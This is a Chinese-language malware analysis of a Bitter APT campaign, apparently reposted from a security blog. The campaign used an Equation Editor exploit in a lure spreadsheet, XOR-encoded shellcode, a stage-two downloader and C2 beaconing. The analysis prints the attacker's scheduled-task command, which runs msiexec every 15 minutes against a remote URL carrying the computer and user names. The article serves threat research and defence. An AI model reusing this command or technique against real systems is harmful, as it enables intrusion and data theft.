APT组织Bitter网络间谍攻击活动实例分析
2023-2-21 15:3:44 Author: www.secpulse.com(查看原文) 阅读量:30 收藏

Bitter(T-APT-17、BITTER、蔓灵花)组织是一个长期针对中国、巴基斯坦等国家进行攻击活动的南亚地区APT组织,因其早期使用的特种木马通信的数据包头部以“BITTER”作为标识而得名。该组织主要针对政府、军工、能源等单位进行攻击以窃取敏感数据,具有强烈的政治背景。

近日,中孚信息威胁研究人员分析了该组织近期一次针对孟加拉国军事机构的攻击活动,攻击者通过利用Office的公式编辑器组件(EQNEDT32.EXE)漏洞,投放恶意诱饵文档和中间恶意软件来部署远程访问木马,进行网络间谍活动。

攻击流程

EQNEDT32.EXE是Office办公软件内的一个公式编辑器组件,该组件存在多个隐藏了很久的远程代码执行漏洞,攻击者可以在office文档中嵌入恶意的公式数据发起攻击,用户打开恶意文档就会中招。

第一阶段,攻击者通过利用具有Office的公式编辑器组件漏洞的恶意文档作为诱饵,诱导用户打开,从而触发漏洞执行恶意shellcode,以下载第二阶段的恶意样本。

第二阶段,攻击者使用了一个名为vc的恶意样本,中孚信息威胁研究人员通过收集受感染计算机名、用户名等敏感信息发送至恶意C&C服务器,创建定时任务以实现持久化操作,并获取下一阶段的恶意载荷。但由于分析时获取载荷的请求已失效无法获取响应内容,所以本文只分析前两阶段的攻击行为。

样本分析(第一阶段)

01

投递诱饵文档

第一阶段攻击者使用一个名称为《Repair of different csoc cstc_ china supplied system - BNS BIJOY.xls》的恶意xls文档作为诱饵诱导受害用户打开以便下载后续的恶意软件,文档信息如下:

02

执行恶意shellcode获取下一阶段载荷

用Excel打开发现内容为乱码,点击A1A2方块显示的是一个函数=EMBED("Equation. 3",") ,这表明在打开该文档时会调用Equation. 3程序。如下图所示:

使用Process Monitor工具监控进程行为,发现打开文档后会启动EQNEDT32.EXE程序以便来执行恶意shellcode。

使用Burpsuite抓包发现打开恶意文档后会发起请求http://***.com/vc/vc来获取第二阶段的payload。

使用Process Monitor的进程树可以看到下载下来的第二阶段的恶意程序会被移动至C:\$Drw目录下,并重命名为fsutil.exe,然后由EQNEDT32.EXE程序调用explorer.exe来启动该程序。

中孚信息威胁研究人员利用oledump查看文档结构发现有如下图所示的几部分组成,将名称为“Equation Native”的部分dump下来,这部分即为攻击者嵌入的恶意shellcode。

03

使用FF作为XOR key对shellcode进行编码

2019年Sophos Labs的一份报告中曾分析了一个利用CVE-2018-0798漏洞的maldoc构造器,该构造器使用xor运算对shellcode进行编码。中孚信息威胁研究人员使用二进制编辑工具查看dump的二进制文件,统计发现字节“FF”出现次数较高,猜测可能使用该字节进行异或操作。

将原二进制内容与FF进行异或操作,可看到一些明显的字符串,包括urlmon.dll和下载第二阶段payload的url:***.com/vc/vc等。

04

获取下一阶段载荷

接下来使用x32dbg联合gflags.exe来调试EQNEDT32.EX执行恶意shellcode的过程。

在urlmon.dll的URLDownloadToFileA API处下断点并运行,如下图所示:

运行程序直到打断处,可以看到程序停到了上一步打的断点URLDownloadToFileA处,且也可以看到下载第二阶段恶意载荷的url——http://***.com/vc/vc。由于分析时该url已经失效无法直接下载恶意载荷。

样本分析(第二阶段)

01

样本信息

因为分析时下载第二阶段恶意载荷的url已经失效,无法直接下载第二阶段的样本,通过威胁狩猎在微步平台下载了第二阶段的样本并继续分析。样本信息如下:

使用PE工具可以看到是一个第二阶段的样本是一个可执行文件,且创建于2022-5-11.

02

解密C&C域名

利用IDA查看样本中的字符串,可以看到 GET请求及疑似拼接的url字段。

通过调试发现第二阶段的恶意程序首先会解密出恶意C&C域名:m.***.com。

03

收集受害主机信息发送至C&C服务器

解密C&C域名后,紧接着便收集受害计算机名称和用户名拼接到请求中并发送到C&C服务器。

恶意样本将收集的信息通过socket发送请求至C&C服务器,但分析时该请求已经失效,无法获取下一阶段的载荷。

04

设置定时任务以实现持久化操作

继续调试发现该恶意样本创建了定时任务,任务名称为AdobeUpdater,内容为:schtasks  /create /sc minute /mo 15 /tn AdobeUpdater /tr  "%coMSPec%  /c start /min msiexec /i http://***.com/csslogs/vis.php?st=%computername%*%username% /qn /norestart"  /f,用于每隔15分钟收集计算机名称和用户名并发送至C&C服务器***.com,由于分析时请求的URL已经失效,所以无法获取请求后的响应载荷。

结语

通过分析可以发现,本次攻击主要利用可Office的公式编辑器组件(EQNEDT32.EXE)漏洞,使用恶意文档作为诱饵诱导用户点击查看,从而触发漏洞执行恶意shellcode并下载下一阶段的载荷,收集受感染机器上的计算机名、用户名等敏感信息发送至恶意C&C服务器,并创建计划任务以实现持久化操作,进行其他恶意操作等。

中孚信息分析团队提醒企业用户,切勿打开社交媒体分享的来历不明的链接,不轻易点击执行未知来源的邮件附件,不运行夸张标题的未知文件,不安装非正规途径来源的APP。同时,企业应该及时备份重要文件,更新安装补丁,当发现不明软件应用时,应及时排查、清除。 

本文作者:中孚信息

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/196457.html


文章来源: https://www.secpulse.com/archives/196457.html
如有侵权请联系:admin#unsafe.sh